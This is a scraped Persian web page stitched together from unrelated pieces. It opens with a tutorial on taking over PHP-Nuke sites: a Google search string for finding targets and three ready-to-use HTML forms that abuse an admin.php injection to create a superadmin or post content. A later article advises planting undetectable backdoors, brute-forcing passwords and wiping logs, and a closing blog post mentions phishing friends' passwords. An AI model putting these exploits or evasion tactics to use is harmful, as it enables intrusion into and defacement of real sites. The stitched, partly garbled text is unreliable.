چگونه یک سایت هک کنیم

Завантаження списків відтворення…

چگونه یک سایت را هک کنم؟ البته اینو
خودم استفاده نکردم

 دوستان خیلی ها دوست دارن سایت هک کنن ولی به
علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن
رو نداره و… به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها
استفاده از باگ های phpnuke هست
که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید.. من برای شما
دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین. برای شروع به
گوگل برید (www.google.com) و بعد باید دنبال سایت هایی که از سیستم
phpnuke
استفاده میکنن بگردید , شاید بگید چه جوری؟ برای این کار کافیه این نوشته رو
کپی و پیست کنید. كد: modules.php?name=Downloads این ماژول در تمامی
ورژن های php nuke وجود داره. خوب بعد از این کار گوگل کلی سایت که از سیستم
phpnuke
استفاده میکنن میاره برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید
ببینید که شاخه phpnuke چیه
ممکنه به این شکلها باشه: كد: http://www.sitename.com/phpnuke/mod…?name=Downloads www.sitename.com/html/modules.php?name=Downloads http://www.sitename.com/portal/modu…?name=Downloads www.sitename.com/modules.php?name=Downloads برای اینکه بتونیم از این روش سایتها
رو هک کنیم باید فایل admin.php رو سایت باشه برای اینکه بدونین هست یا نه
كد: modules.php?name=Downloads اینو پاک کنین و
جاش بنویسید admin.php
مثلآ: كد: www.sitename.com/admin.php اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود
داره و اگه هم با Error
برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته. اگه admin.php بود که به مرتله بعدی میرید
اگر هم نبود اون سایت رو بی خیال شید. خوب تالا ما فرض میکنیم که
admin.php وجود
داره. من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم
مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.
شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه
File گزینه Save As.. رو انتخاب کنید و هر کجا
که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید
پسوند اونو .HTML بزارید. بعد فایلتونو داخل Notepad باز کنید و به جای
[sitename] آدرس
سایتی رو که میخواین هک کنین رو بنویسید. کد اول: با استفاده از این
میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس وارد سیستم
مدیریت سایت بشید و سایت رو هک کنید. كد: form name=”mantra” method=”POST”
action=”http://www.sitename.com/admin.php”> USERNAME: input type=”text” name=”add_aid”>br> NOME: input type=”text” name=”add_name”>br> PASSWORD: input type=”text” name=”add_pwd”>br> E-MAIL: input type=”text” name=”add_email”>br> input type=”hidden” name=”admin”
value=”eCcgVU5JT04gU0VMRUNUIDEvKjox”>br> input type=”hidden” name=”add_radminsuper” value=”1″>br>
input type=”hidden”
name=”op” value=”AddAuthor”>p> input
type=”submit” name=”Submit” value=”Create Admin”>br> form> کد دوم: با
این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید. كد:
form name=”mantra”
method=”POST” action=”http://www.sitename.com/admin.php”>
p>TITLE: input type=”text” name=”add_title”> br> CONTENT: textarea name=”add_content” rows=10 cols=50>textarea> br> DATE: input type=”text” name=”add_mdate”>
br>
E-MAIL:
input type=”text” name=”add_expire”>
br>
input type=”hidden”
name=”add_expire” value=”0″>
br>
input type=”hidden”
name=”add_active” value=”1″>
br>
input type=”hidden”
name=”add_view” value=”1″>
br>
input type=”hidden”
name=”admin” value=”eCcgVU5JT04gU0VMRUNUIDEvKjox”> br> input type=”hidden” name=”add_radminsuper” value=”1″>
br>
input type=”hidden”
name=”op” value=”addmsg”>
p>
p> input type=”submit” name=”Submit” value=”Post this message”>
br>
p>
کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه. كد:
form name=”mantra”
method=”POST”
action=”http://www.sitename.com/admin.php”> p>TITLE: input type=”text” name=”title”>
br>
CONTENT:
textarea name=”content” rows=10 cols=50>textarea> br> input type=”hidden”
name=”admin” value=”eCcgVU5JT04gU0VMRUNUIDEvKjox”>
br>
input type=”hidden”
name=”add_radminsuper” value=”1″> br> input type=”hidden” name=”op”
value=”massmail_send”> p> p>
input type=”submit” name=”Submit”
value=”Send to target site newsletter”> br> p> form> خوب اینم از
آموزش هک کردن سایتهای popnuke از این روش امیدوارم به کارتون بخوره
اگه کسی روش دیگه ای بلد هست اینجا بگه ممون راستی اگه می خواین
سایت های ایرانی که از php
nuke
استفاده می کنند را پیدا کنید کافیه به
googel برید
و عبارت Farsi project by PHP-Nuke را بنویسید .

هکر در ابتدا به معنای متخصص خلاق و توانمندی بود که از راه کارهای خلاقانه برای حل مساله استفاده می‌کرد. ولی امروزه از این لفظ در جای نادرست و به منظور توصیف خرابکاران اینترنتی استفاده می‌شود.

در این مطلب قصد داریم در 12 مرحله به شما بگوییم چگونه یک متخصص امنیتی و یا یک هکر شوید.

برنامه نویسی چیزی است که یک هکر به آن به چشم یک بازی هوش نگاه می‌کند. هکرها علاقه شدیدی به برنامه نویسی دارند و همیشه در حال کد نویسی هستند، اگر مایل به تبدیل شدن به یک متخصص درجه یک در زمینه امنیت هستید، حتما باید برنامه نویسی را دوست داشته باشید و از آن استفاده کنید.

البته برنامه نویسی راه انجام یک تست نفوذ را آسان تر می‌کند، اگر یک هکر به سورس کد یک برنامه دسترسی پیدا کند می‌تواند با بررسی‌های خود به راه‌های نفوذ در آن برنامه دست پیدا کند.

چگونه یک سایت هک کنیم

زبان‌های خوب بسیاری هستند که باید آن‌ها را یاد بگیرید ولی مطمین باشید اگر کار را با یک زبان شروع کنید و یکی را به خوبی یاد بگیرید در آینده قادر خواهید بود در سریع ترین زمان ممکن زبان‌های بیشتری را بیاموزید.

لیستی از زبان‌های مفید و مورد نیاز برای یک متخصص امنیت:

زبان C: شاید هیچ زبانی به اندازه C مهم و کلیدی نباشد. سیستم‌های عامل را با زبان C می‌نویسند و متخصصین علاقه بسیاری به این زبان دارند. وقتی با این زبان آشنا شوید می‌توانید به ساختار و علمکرد سیستم عاملی مانند Linux پی ببرید.

زبان Python: زبان Python قدرتمند و ساده و خیلی سریع می‌توانید آن را فرا بگیرید. بسیاری از متخصصان امنیت از این زبان برای انجام فرایند‌های تکراری نفوذ استفاده می‌کنند، بنابراین اگر این زبان را فرا بگیرید می‌توانید به سادگی exploit‌ها را بخوانید و برای خود exploit‌های کاربردی بنویسید.

زبان برنامه نویسی PHP: زبان برنامه نویسی PHP قلب تبنده اکثر سایت‌های اینترنتی است و فراگیری آن به شما در انجام حجم وسیعی از فعالیت‌ها کمک ارزشمندی می‌کند.

زبان اسمبلی: زبان اسمبلی از آن جهت مفید است که سطح پایین ترین زبانی است که پردازنده شما قادر به فهم آن می‌باشد. اگر با این زبان آشنا نباشید از exploit‌های زیادی محروم خواهید بود.

زبان SQL: زبان SQL یک زبان برای ارتباط نرم افزار با پایگاه داده‌های رابطه‌ای تحت SQL است. حجم قابل توجه سایت‌هایی که در اینترنت هک می‌شوند بدلیل داشتن اشکالات در SQL خود آسیب پذیرند. با یاد گرفتن این زبان و آموختن تکنیک‌های SQL Injection می‌توانید به میزان قابل توجهی قابلیت‌های نفوذگری خود را افزایش دهید.

شاید بارها این را شنیده باشید که نسخه‌هایی از لینوکس واقعا به منظور هک و تست نفوذ پدید آمده اند. کالی لینوکس یکی از این نسخه‌های قدرتمند است که تقریبا هر ابزاری را برای انجام عملیات نفوذ در اختیار دارد.

وقتی از لینوکس استفاده می‌کنید می‌توانید به حجم وسیعی از ابزارهای قدرتمند برای انجام نفوذ دسترسی داشته باشید.

لینوکس به دلیل برخوردار بودن از خط فرمان قدرتمند می‌تواند بسیاری از کارها را به صورت خودکار برای شما انجام دهد.

اگر در bash Scripting خوب باشید می‌توانید فرایند‌های تکراری را به سیستم عامل بسپارید. bash Scripting دانشی است که در آن با نوشتن فایل‌های ساده می‌توانید کنترل سیستم عامل را در اختیار بگیرید.

اگر شبکه را به درستی و به صورت مفهومی یاد بگیرید می‌توانید در کار خود بسیار موفق باشید. خیلی از متخصصین تست نفوذ آشنایی زیادی با شبکه ندارند، بنابراین از حجم وسیع آسیب پذیری‌های موجود در شبکه‌ها محروم می‌شوند.

یادگیری شبکه نیاز به یادگیری اصطلاحات و استانداردهای موجود و توانایی در پیاده سازی شبکه‌های مختلف است.

گاهی به یک شبکه نفوذی صورت می‌پذیرد ولی برای گسترش دسترسی‌ها و نفوذ به دیگر سیستم‌ها نیاز است که به مفاهیم شبکه مسلط باشید.

برای یادگیری شبکه می‌توانید کار خود را با دوره‌ها و کتاب‌های network+ شروع کنید.

باید هدف خود را به درستی انتخاب کنید، همیشه توجه داشته باشید هر چقدر که حرفه‌ای باشید متخصصان پلیس و مقامات امنیتی کشور به دلیل دانش بالا و دسترسی‌های سطح بالا در شبکه اگر بخواهند به سادگی می‌توانند شما را دستگیر کنند.

در انتخاب هدف‌های خود دقیق باشید و هیچ وقت عملی خلاف قانون انجام ندهید، همیشه امن ترین سرویس‌ها حتی سرویس‌های مخفی و به ظاهر غیر قابل نفوذ، نفوذ پذیر شده اند و خلاف کاران را لو داده اند.

می توانید خود را هک کنید! به این معنا که یک سرور مجازی برای خود ایجاد کنید و سعی کنید به آن نفوذ کنید.

می توانید از سایت‌های آسیب پذیر که برای تمرین در اختیار علاقه مندان به یادگیری امنیت ایجاد شده اند استفاده کنید.

وقتی هدف خود را با توجه به نکات گفته شده در بالا انتخاب کردید، باید عملیات جمع آوری اطلاعات را شروع کنید، در این مرحله هر اطلاعاتی مفید است از جمله:

نکته 1: در تمام مراحل تست نفوذ امنیت خود را در بالاترین سطح حفظ کنید. گاهی در انجام عملیات تست و بررسی توسط مدیر سیستم شناسایی می‌شوید و مدیر سیستم اقدام به هک و سرقت اطلاعات شما می‌کند.

نکته 2: قبل از انجام هر فعالیتی خوب فکر کنید، ممکن است وقتی بسته‌های بسیاری را به سمت سیستم هدف ارسال کنید سرور نیت شما را کشف کرده و شما را بلاک کند. ممکن است شما یک آسیب پذیری را کشف کنید ولی با انجام اعمال مشکوکی لو رفته و مدیر سیستم آن نقص و آسیب پذیری را یافته و بر طرف کند.

تقریبا برای ورود به هر سیستم تحت وب و یا سیستم تحت شبکه ای باید رمز عبور آن را دانست، دانستن رمز عبور یعنی وارد شدن به سیستم تحت وب و بواسطه ورود به سیستم تحت وب، ورود به سیستم عامل سرور.

البته در بسیاری از حالت با نفوذ پذیری SQL Injection می‌توانید یک Hash از کلمه عبور را بیابید که با کمک تکنیک‌های گفته شده در پست کرک کردن عبارات هش شده به پسورد ورود دست پیدا کنید.

البته راهکارهای دیگری نظیر burtforce وجود دارند که با آن‌ها می‌توانید حجم وسیعی از کلمه‌های عبور را بر روی فرم ورود تست کرده و به کلمه عبور صحیح دسترسی پیدا کنید.

نکته: تکنولوژی‌های جدید از کارت گرافیک به عنوان پردازنده کمکی برای عملیات رمزنگاری استفاده می‌کنند که شکستن رمز آن‌ها می‌تواند سریع تر باشد.

نکته: یکی از راه کارهای شکستن عبارات هش شده استفاده از جداول رنگین کمانی هستند.

گاهی مجبور می‌شوید یک سایت کوچک را هک کنید تا با گرفتن دسترسی روی آن سایت کوچک بتوانید سرور اصلی را هک نمایید.

در برخی حالات سعی می‌کنید وارد یک شبکه WIFI شوید و از آن شبکه Wifi کنترل دستگاه‌ها و سیستم‌های موجود در آن شبکه را به دست بگیرید.

به همین دلیل همیشه به خاطر داشته باشید که ورود به یک سیستم تازه شروع کار است و بعد از آن باید به دنبال افزایش دسترسی برای رسیدن به هدف خود باشید.

چگونه یک سایت هک کنیم

در فرایند نفوذ گاهی یک باگ در نرم افزارهای موجود در سیستم عاملی برای buffer overflow می‌شود که پس از آن می‌توانید کدهای خود را به سیستم تزریق کنید.

وقتی بتوانید به سیستم دسترسی پیدا کنید باید تا جایی که می‌توانید در مورد نرم افزارهای نصب شده روی سیستم اطلاعات کسب کنید تا با یافتن نرم افزارهای مشکل دار به سیستم نفوذ کنید.

گاهی ممکن است بتوانید با یافتن کلمه عبور وارد آن سیستم شوید، ولی پس از چند روز دوباره پسورد عوض شده و دیگر نتوانید به آن سیستم وارد شوید.

بنابراین پس از هر نفوذی باید سعی کنید یک در پشتی و یا BackDoor در سیستم ایجاد کنید.

درهای پشتی بسته به نوع سیستمی که به آن نفوذ کردید می‌توانند پیچیده و یا ساده باشند. اکیدا درهای پشتی باید به گونه‌ای اضافه شوند که مدیر سیستم نتواند به ماهیت و نفوذ شما پی ببرد.

مخفی ماندن همیشه یکی از مهم ترین اصول در انجام عملیات نفوذ است. اگر از ساختار سیستم عاملی که به آن نفوذ می‌کنید اطلاعی نداشته باشید نمی‌توانید رد پاهای خود را پاک کنید. تقریبا هر عملیاتی در وب سرور و در سیستم عامل در فایل‌های Logs ذخیره می‌شود، بنابراین همیشه حین انجام نفوذ و پس از آن رد پای خود را حذف کنید.

حذف رد پا تشخیص نفوذ شما را توسط مدیر سیستم سخت یا غیر ممکن می‌کند.

با سلام خدمت مدیر وب سایت hitos

ببخشید یه راهنمایی میخواست برای یادگیری زبان c کتاب خوب یا فیلم های اموزشی مفیدی هست که به درد لینوکس و هک و امنیت بخوره بهم راه نمایی کنید بسیار ممنون میشم.

چون اکثر کتاب ها و فیلم های اموزشی مجود یا به درد نمیخورن یا مدرسش خوب نیست یا مدرسش درست بلد نیست حرف بزنه یا یجیز دیگه دیگه بدرد نخور برای برنامه نوشتن هست.

امید وارم منظور منو متوجه شده باشید اگه یه اموزش خوب هست که برای من مفیده ممنون میشم راهنمایی کنید.

سلام

برنامه نویسی چیزی نیست که خیلی نیازمند کتاب باشه، ولی به نظر من یک کتاب راحت رو شروع بکنید، وقتی به پایان رسوندید شما دیگه تو زبون C حرفی برای زدن دارید.

می تونید برید سراغ خوندن یک کتاب زبان اصلی مرجع یا این که برید سراغ کد خوانی کردن پروژه های نوشته شده به زبان C.

دوست عزیز سلام من برای یادگیری زبان اسمبلی کتاب می خوانم اما فهم آن برایم دشوار است راه آسان تری برای یادگیری آن هست؟؟

بعضی ها با فیلم دیدن یادگیری بهتری دارند بعضی ها با کتاب، و بعضی دیگر کلاس رفتن.

شما راه حل های مختلف رو امتحان کن و ببین کدام برای شما مناسب تر است.

دمت گرم داداش 21 سالمه از 8 سالگی پشت سیستم یودم تابحال سایتی مثل سایت تو پر محتوا ندیده بودم منظورم اینه چیزایی ک بایدو نوشتی مثل سایتای دیگه چرتوپرت ننوشتی یه ساعته تو سایتم هنوز دارم میخونم.دمت گرم گفتم ی تشکر کنم.کمتر پیش میاد از کسی تشکر کنم.

سلام

ممنون از لطفتون.

سلام ایا خود شما هم کلاس اموزشی (حضور یا غیر حضور ) برگزار میکنیم که ثبت نام کنیم اگه جوابتون بله هستش هزینه کلاس ها چند قیمته و کلاس های حضوری تون در چه شهر هایی برگزار میشه

سلام

چند ماهیه تدریس رو بدلایلی انجام نمی دم.

موفق باشید.

سلام خسته نباشین یه سوالی داشتم میخواستم بپرسم که اگه ما بخوایم یک سیستمی رو هک کنیم نیاز به برنامه ی داریم؟

سلام

هک کردن سیستم دیگران کاری خلاف قانون و اخلاق می باشد.

ولی برای تست نفوذ به سیستم ها نیازمند آشنایی به پروتوکل های شبکه، سیستم های عامل، برنامه نویسی و در کنار اون ها نرم افزارهای کاربردی مفید هستید.

یادگیری این زبان ها دشوار است اگر میشودآن ها رابه صورت فیلم نمایش دهید

باتشکر

برخی از این زبان ها آموزش داده شده است، و برخی در آینده در سایت قرار می گیرند.

با عضویت در خبرنامه هیتوس در جریان آخرین پست ها و آموزش های ما باشید. هیتوس برای اعضای خبرنامه خود تخفیف ویژه در نظر می گیرد

سایت‌های بسیاری در زمینه ارائه آموزش‌های مهندسی و کامپیوتری فعال هستند که برخی از این سایت‌ها واقعا فعالیت قابل تحسینی دارند.

هیتوس قصد رقابت با هیچ سایت خاصی را ندارد

ما در هیتوس به دنبال پیشرفت خود و پیشرفت کاربران دنبال کننده مطالب سایت خود هستیم. امیدواریم این همراهی یک رابطه سراسر پیروزی و موفقیت برای ما و کاربرانمان باشد.

امیدواریم در آینده بتوانیم خدمات قابل قبول و تاثیرگذاری به کاربران خود ارائه دهیم. حسن همراهی کاربران برای ما بزرگترین سرمایه و افتخار است.

هیتوس برای شروع در زمینه‌های زیر فعال خواهد بود:

البته در آینده هر آموزشی که توانایی ایجاد محتوی برای آن داشته باشیم را ارائه خواهیم داد. 

در صورت داشتن هر گونه پیشنهاد و انتقاد می‌توانید با ایمیل info@hitos.ir ارتباط برقرار کنید.

ما را دنبال کنید

(۰۲۱) ۷۵ ۴۸ ۳۰۰۰

.تمام حقوق این وبسایت متعلق به شرکت توسعه زیر ساخت تاژان میباشد

“آینده در دستان شماست

زیبایی هایی که هنوز ندیده اید

میکس فوق العاده زیبا از آهنگ دل را ببین با صدای علیرضا افتخاری و سفر های مقام معظم رهبری به شهر های مخطلف کشور (زاهدان-زنجان-بم) که چیز پر مغز و قشنگی از آب در آمده حتماً ببینید…

چگونه یک سایت هک کنیم

موسسه تدوین آثار و نشر اخلاقیات شهدای شهرستان زرند

مداحی مهدی اکبری کاش بودی کرببلا برادر بی حرمم حسن جان

در آپارات شما قادر خواهید بود ویدئوهای خود را با دیگران به اشتراک بگذارید و از اخبار رویدادها اطلاع پیدا کنید.

آرشیو هزاران فیلم وسریال ایرانی و خارجی

آرشیو انیمیشن و فیلم های مناسب برای کودکان

مسئولیت محتوای ویدئوها و هرگونه پاسخگویی به ادعاهای مطروحه توسط اشخاص حقیقی
و حقوقی با منتشر کننده است و آپارات هیچگونه مسئولیتی نسبت به آن ندارد.

اگر مطلب اخیر من در نارنجی در مورد هکرها و کلاه هاشون رو خونده باشین می دونین که ما اقسام و انواع هکر داریم. اصولا که هکر معنی ای بسیار فراتر از کامپیوتر داره ولی در بحث امنیت کامپیوتر هم اطلاق «هکر» فقط به کسی که پسورد می دزده و به سرورها نفوذ می کنه اشتباه اما به هرحال.. خیلی ها هستن که دوست دارن «هکر» بشن و به سرورهای بقیه نفوذ کنن و من اینجا هستم که این رو به شما آموزش بدم. شاید براتون جالب باشه ولی کل این آموزش یک خطه:

خسته نباشین مطلب تموم شد (:

البته اگر بازم سوال دارین در خدمتتون هستم.

اول بگم که مشکلات امنیتی رو توی کتاب ها ننوشتن و توی کلاس ها هم درس نمی دن. اگر واقعا هدفتون نفوذ به یک سرور است باید باهوش تر / با تجربه تر از این باشین که فکر کنین واقعا یک راهی برای نفوذ به سرورها هست که قبلا استفاده شده و توی یک کتاب هم نوشتنش و بعد هیچ کس هم به نویسنده اون برنامه نگفته و حالا یکی تو کلاسی توی ایران از شما پول می گیره که اونو به شما یاد بده یا مثلا یک نفر دیگه اونو توی یک کتاب نوشته (و شاید یکی دیگه اون کتاب رو ترجمه کرده)‌ و شما شانس آوردین که قبل از صاحب سرور/برنامه این کتاب رو خوندین و می تونین از طریقش به جایی نفوذ کنین.

چگونه یک سایت هک کنیم

شما یا باید به اندازه کافی حرفه ای / باهوش / پر تلاش باشین تا خودتون مشکلی رو کشف کنین که قبلا هیچ کس کشف نکرده و در نتیجه حل هم نشده و از طریقش می شه به یک سرور نفوذ کرد. در صورتی که واقعا چنین کشفی کردین پیشنهادم اینه که اونو به شکل یک مقاله معتبر توی یک کنفرانس معتبر ارائه بدین و تا آخر عمر به عنوان یک متخصص امنیت و هکر معتبر شناخته بشین و نه یک نفر که گوشه خونه اش نشسته دلش خوشه که به یک سرور نفوذ کرده یا یک نفر که گوشه زندان داره عمرش رو تلف می کنه.

یک راه میانه هم هست: مشکلات قدیمی که حالا حل شدن رو یاد بگیرین و دنبال سایت هایی بگردین که مدیر سیستم های تنبلی دارن که این مشکلات رو حل نکردن یا برنامه نویس های بی سواد، سمبل کن و تنبلی که اون مشکلات رو توی برنامه هاشون تکرار کردن و بعد اگر به چنین مواردی برخوردین اون سایت رو هک کنین. با اینکار تبدیل می شین به یک بچه اسکریپتی که کارش استفاده از نتیجه کار بقیه است و اجرای برنامه های «هک» (: اوه.. در این موارد معمولا خودتون قربانی کسی هستین که برنامه هک کننده ای که شما باهاش سایت های آپدیت نشده و قدیمی رو «هک» می کنید رو نوشته.

نه. توی نفوذ به سرور پول چندانی نیست. حتی شغل «متخصص امنیت / تست نفوذ / ….» هم پول خیلی زیادی نداره در مقابل زحمت و بازار سختش. قصه هایی مثل اینکه فلان شهر همه از دزدی کارت اعتباری پولدار شدن و فلانی کارش نفوذ به سرور و فروش اطلاعات است و فلان فروم مخفی که توش اکانت بانک مردم معامله می شه رو جدی نگیرین. چنین اطلاعاتی لو می رن و فروش هم می رن اما سود نهایی بسیار کمه چون مقدار پول در جهان ثابته و انواع و اقسام سیستم ها هستن برای پیگیری چنین موضوعاتی. اگر کسی پول زیادی به دست بیاره معنی اش اینه که کسی پول زیادی از دست داده (یا کسان زیادی هر کدوم پول کمی از دست دادن) و سیستم های کامپیوتری دائما مشغول بررسی این موارد هستن و تشخیصشون می دن و از روی لاگ ها به راحتی قابل ردیابی است.

اینکار در عمل غیر ممکنه. این سیستم ها بسیار پیشرفته هستن با کلی کارمند برای مقابله با هک شدن. کاری که می تونین بکنین اینه که یک صفحه شبیه صفحه گوگل درست کنین و برای دوستاتون لینکش رو بفرستین تا توشون لاگین کنه و شما پسوردش رو بدزدین. یا اینکه ازشون بخواین رو کامپیوتر شما لاگین کنن و پسوردشون رو ذخیره کنین و اینجور کارهای غیرشرافتمندانه اما اگر بحث کار فنی است، روی اینجور سایت ها حساب باز نکنین (:

قدم به قدم جلو برین و چیز یاد بگیرین. آدم معتبری بشین و کارهای خوب بکنین. ادعای «من هکرم» برای دوستانی که از این چیزها سر در نمی یارن ممکنه شما رو باحال جلوه بده ولی در طولانی مدت دچار پدیده ای می شین که من بهش می گم «از خود جلو افتادن». همون مشکل کلاسیکی که توش شما تظاهر می کنین به کردن کارهایی که از سطح خودتون بالاتره و این باعث می شه هیچ وقت جرات نکنین یکبار دیگه از پایه شروع کنین و پیش برین. مجبورین دائما بگین «اینو بلدم» و این خطرناک ترین چیز برای چیز یاد گرفتن است. از کاری که می کنین لذت ببرین و قدم به قدم توش پیش برین (: بقیه رو هم کپی نکنین چون به اندازه کافی «بقیه» داریم (:

بسیار مرتبط: مقاله چگونه هکر شویم یک هکر واقعی (اریک ریموند) رو بخونین

اگر سوال دیگه ای هست که جا افتاده تو کامنت ها بگین که جواب بدم (:

شاد باشید.

10